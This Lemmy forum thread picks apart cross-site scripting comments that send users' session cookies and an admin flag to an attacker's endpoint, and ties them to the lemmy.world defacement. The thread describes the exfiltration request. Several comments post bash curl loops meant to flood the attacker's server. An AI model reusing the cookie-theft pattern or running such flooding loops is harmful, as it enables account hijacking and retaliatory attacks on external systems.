this post was submitted on 10 Jul 2023
248 points (97.0% liked)

Asklemmy

43363 readers
2411 users here now

A loosely moderated place to ask open-ended questions

Search asklemmy ๐Ÿ”

If your post meets the following criteria, it's welcome here!

  1. Open-ended question
  2. Not offensive: at this point, we do not have the bandwidth to moderate overtly political discussions. Assume best intent and be excellent to each other.
  3. Not regarding using or support for Lemmy: context, see the list of support communities and tools for finding communities below
  4. Not ad nauseam inducing: please make sure it is a question that would be new to most members
  5. An actual topic of discussion

Looking for support?

Looking for a community?

~Icon~ ~by~ ~@Double_A@discuss.tchncs.de~

founded 5 years ago
MODERATORS
Cloak@lemmy.ml
mekhos@lemmy.ml
tmpod
14specks@lemmy.ml
248
What are these comments on lemmy posts? (lemmy.sdf.org)
submitted 1 year ago by Fleecer74@lemmy.sdf.org to c/asklemmy@lemmy.ml
86 comments fedilink hide all child comments
 

Are they just an issue with wefwef or trying to use an exploit

top 50 comments
sorted by: hot top controversial new old
[โ€“] Tartas1995@discuss.tchncs.de 97 points 1 year ago* (last edited 1 year ago) (4 children)

Hey, I can tell you want it does. While I don't know if they try to download something too (while it really doesn't look like it), they are trying to steal your browser cookies.

I haven't removed the obfuscation yet as I am literally in bed but I can tell the general idea of the code.

Onload is a html attribute. Html attribute tell your browser more about what the browser should be doing. So basically onload is an instruction to your browser. By posting those comments, they try to run something called cross site scripting. Basically they want to run their code in your browser without them being the website owner. So now we know the intend of the post, let's look into the details.

Onload is an attribute that tells the browser to do something once it is fully loaded.

Fetch is a function that allows your browser to request additional information from the server. Endless scrolling would be done with that.

String.fromcharcode is just there to hide a little bit. Think of it as a fancy way to say a word. they are saying a website to connect to there.

Then document.cookie are your cookies for that website.

The next thing is probably your username or something.

So what does that mean? They try to make your browser execute their code when the website is onloaded. The code sends your cookies and your username(?) To a server. They probably save the username and cookie and try to steal the account later.

You seeing the code is good evidence that your browser hasn't execute the code as the browser didn't understand it as code to be executed but code to display. So you are probably safe and don't need to worry

Edit: ups sorry for not answering the question. I don't know which client they are targeting. They might or might not be targeting wefwef. But they target you, the user, too. And it is probably for Webbrowser users, so chances are wefwef or other web clients.

Edit edit: some people pointed out that it is not the username but basically the admin status of the account.

[โ€“] erre@feddit.win 43 points 1 year ago* (last edited 1 year ago) (3 children)

Looks like it's issuing a GET to https://zelensky.zip/save/{ENCODED_JWT_TOKEN_AND_NAV_FLAG}. The ENCODED_JWT_TOKEN is from btoa(document.cookie+nav_flag) where nav_flag is essentially 'navAdmin' if the account hit is an admin or '' if the user hit is not an admin (it checks if the admin button in the nav exists). Their server is likely logging all incoming requests and they just need to do a quick decoding to get jwt tokens and a flag telling them if it's an admin account.

I'd be hesitant to visit Lemmy on a browser atm ๐Ÿ˜“

[โ€“] Supermariofan67@lemmy.fmhy.ml 39 points 1 year ago (3 children)

Sure enough, the .zip TLD is just being used for malicious activity

[โ€“] humanreader@infosec.pub 20 points 1 year ago

Google Domains, creating new ways to exploit users right before being sold off to Squarespace.

[โ€“] Blizzard@lemmy.zip 14 points 1 year ago

Lemmy.zip is cool!

[โ€“] ShellMonkey@lemmy.socdojo.com 4 points 1 year ago

Good to know, will look into adding it to the kill-it lists out there. Generally more inclined to rely on dynamic naughty lists but sometimes you just need to cut off the limb if it's 90% rotten.

[โ€“] killbot_gamma@midwest.social 7 points 1 year ago

Can we just hit that domain with junk data and crash their shit?

[โ€“] Tartas1995@discuss.tchncs.de 4 points 1 year ago

Yo thanks for the obfuscation. Makes a lot of sense.

[โ€“] Xylight@lemmy.xylight.dev 18 points 1 year ago (2 children)

Doesn't Lemmy use HttpOnly cookies? This would fix any js based exploit.

[โ€“] Dirk@lemmy.ml 13 points 1 year ago (2 children)

Also, strict CSP would prevent it entirely.

load more comments (2 replies)
[โ€“] Tartas1995@discuss.tchncs.de 4 points 1 year ago (2 children)

I don't know what Lemmy uses tbh. I don't even know if the code would work when run. Like i don't know e.g. if they grab the username(?) correctly. I just understand their intentions but yeah their execution might be horrible.

load more comments (2 replies)
[โ€“] Icarus@lemmy.ml 9 points 1 year ago (1 children)

so does this run automatically ? without the user doing anything ?

[โ€“] Tartas1995@discuss.tchncs.de 10 points 1 year ago

If it would work, which it seems like it doesn't. Yes, it is intended to be automatical.

[โ€“] Gellis12@lemmy.ca 7 points 1 year ago (1 children)

The encoded strings are https://zelensky(dot)zip/save/ and navAdmin

load more comments (1 replies)
[โ€“] malloc@programming.dev 91 points 1 year ago (6 children)

Lemmy.world instance under attack right now. It was previously redirecting to ๐Ÿ‹ ๐ŸŽ‰ and the title and side bar changed to antisemitic trash.

They supposedly attributed it to a hacked admin account and was corrected. But the instance is still showing as defaced and now the page just shows it was โ€œseized by redditโ€.

Seems like there is much more going on right now and the attackers have much more than a single admin account.

[โ€“] malloc@programming.dev 41 points 1 year ago (2 children)

I just want to add a quick note:

From OPs screenshot, I noticed the JS code is attempting to extract the session cookie from the users that click on the link. If itโ€™s successful, it attempts to exfiltrate to some server otherwise sends an empty value.

You can see the attacker/spammer obscures the url of the server using JS api as well.

May be how lemmy.world attackers have had access for a lengthy period of time. Attackers have been hijacking sessions of admins. The one compromised user opened up the flood gates.

Not a sec engineer, so maybe someone else can chime in.

[โ€“] Gellis12@lemmy.ca 34 points 1 year ago (3 children)

Here's a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64); sleep 1; done

Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It'll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.

[โ€“] Kangie@lemmy.srcfiles.zip 14 points 1 year ago (1 children)

Try

while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64) > /dev/null ; sleep 1; done

It'll prevent you from having to see the drivel that curl returns from that site.

[โ€“] Gellis12@lemmy.ca 9 points 1 year ago (1 children)

Oh weird, it wasn't returning anything a few minutes ago. I wonder if we pissed then off lol

load more comments (1 replies)
[โ€“] milicent_bystandr@lemmy.ml 7 points 1 year ago (1 children)

Why would you include your hostname in the hash? That just sounds like an invitations for a mistake to leak semi-private telemetry data.

Come to think of it.... Isn't obscured telemetry exactly what your suggestion is doing? If they get or guess your hostname by other means, then they have a nice timestamped request from you, signed with your hostname, every second

[โ€“] Gellis12@lemmy.ca 13 points 1 year ago

It's essentially to add a unique salt to each machine that's doing this, otherwise they'd all be generating the same hash from identical timestamps. Afaik, sha hashes are still considered secure; and it's very unlikely they'd even try to crack one. But even if they did try and were successful, there isn't really anything nefarious they can do with your machines local name.

[โ€“] gandalftheBlack@lemmy.ml 4 points 1 year ago* (last edited 1 year ago)

Here's the one where it uses epoch time (better randomization) and also hides the output of curl

while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done
[โ€“] Mic_Check_One_Two@reddthat.com 18 points 1 year ago

You seem to be correct. Some sort of drive by login token scraper. Changing your password wonโ€™t help, because they still have an authorized copy of your login token. And I donโ€™t think Lemmy has any sort of โ€œLog out of all devicesโ€ button, (which deauthorizes all of the accountโ€™s login tokens) so thereโ€™s not much that a compromised account holder can do to stop it once the hacker has that token.

Itโ€™s the same thing that got Linus Tech Tips a few weeks back. Their entire YouTube account got hacked and turned into a fake โ€œbuy into our crypto and Elon Musk will give you a bunch of moneyโ€ scam a few weeks back. And Linus quickly discovered that changing their passwords didnโ€™t help, because the hackers were able to simply continue using the token they already had.

This was likely going on for a while, and only recently got activated because they finally snagged an admin account. Shit like this can lurk for a long time, simply waiting for the right target to stumble into it. They donโ€™t really care about the individual accounts, except for helping spread the hack farther. But once they grabbed that admin account, they had what they wanted.

[โ€“] Cmot_Dibbler@lemmy.ml 17 points 1 year ago (1 children)

Lemon party... Truly the fediverse is bringing us back to the golden age of the internet.

load more comments (1 replies)
[โ€“] RoundSparrow@lemmy.ml 16 points 1 year ago

Another instance was hacked too: https://lemmy.blahaj.zone/

[โ€“] Wahots@pawb.social 7 points 1 year ago (1 children)

Must be some boomer if they know what lemon party is, lmao. It's been a hot minute since lemon party, one man one jar, or two girls one cup were being talked about.

[โ€“] Wxnzxn@lemmy.ml 14 points 1 year ago (1 children)

Linking to lemonparty and saying "seized by reddit" strikes me as the playbook of an old 4chan troll/raid, trying to instigate more drama between two places they both hate at once.

[โ€“] humanreader@infosec.pub 6 points 1 year ago

Resetting federation to threads.net is even stronger proof that this was done by a 'holds sporks so randum' type of script kiddies.

[โ€“] BanjosKazoo@geddit.social 4 points 1 year ago

I can't log into my account on lemmy.world, but I guess this is what they mean by federation and different instances continuing to work.

load more comments (1 replies)
[โ€“] nothendev@sopuli.xyz 46 points 1 year ago

if it has document.cookie in it - it is trying to steal your cookies, to use your account. that's a JavaScript link that, well, sends your account cookies to a random ass site.

[โ€“] Papanca@lemmy.world 44 points 1 year ago (1 children)

A few minutes ago Ruud posted that there was a hack, i wonder if it has something to do with that?

https://lemmy.world/post/1290412

[โ€“] loutr@sh.itjust.works 32 points 1 year ago

Yes, these comments are JavaScript code, intended to run in the browser of anyone viewing them. Best to stay clear of the webapp for now (native mobile apps should not be vulnerable).

[โ€“] wetnoodle@lemmy.blahaj.zone 35 points 1 year ago (2 children)

idk for sure but people are saying lemmy.world got hacked maybe it has to do with that?

[โ€“] Max_P@lemmy.max-p.me 22 points 1 year ago (1 children)

Definitely seems to be trying to exploit the same thing

[โ€“] wetnoodle@lemmy.blahaj.zone 8 points 1 year ago* (last edited 1 year ago)

yeah after reading more of the post I linked it definitely looks like it

[โ€“] tarjeezy@lemmy.ca 20 points 1 year ago (3 children)

The encoded string contains the URL zelensky dot zip. Zip is one of the newer top-level domains. It itself is not a zip file, but I am not going to visit that site to find out whatever treasures it has to offer..

[โ€“] Dirk@lemmy.ml 7 points 1 year ago (8 children)

Another reason to block this TLD in the firewall solution.

[โ€“] tarjeezy@lemmy.ca 6 points 1 year ago (4 children)

Yea I've got both .zip and .mov blocked on my pihole

load more comments (4 replies)
load more comments (7 replies)
[โ€“] erre@feddit.win 5 points 1 year ago

Curl didn't return anything. They're likely just using it to log requests since the request path contains the data they need.

[โ€“] Gellis12@lemmy.ca 3 points 1 year ago

Not just that, it looks for a navAdmin cookie in your browser and sends that to zelensky(dot)zip/save/<your cookie here> in the form of a GET request.

[โ€“] Granixo@feddit.cl 15 points 1 year ago

Spez's Revenge

[โ€“] BrikoX@lemmy.zip 10 points 1 year ago (1 children)

Clicking on it would run javascript on load (most browsers block it by default), but I would avoid clicking either way.

load more comments (1 replies)
[โ€“] aloeha@lemmy.world 4 points 1 year ago (3 children)

Hey, has this been fixed? I'm nervous about using Lemmy on my work computer now.

load more comments (3 replies)
load more comments
view more: next โ€บ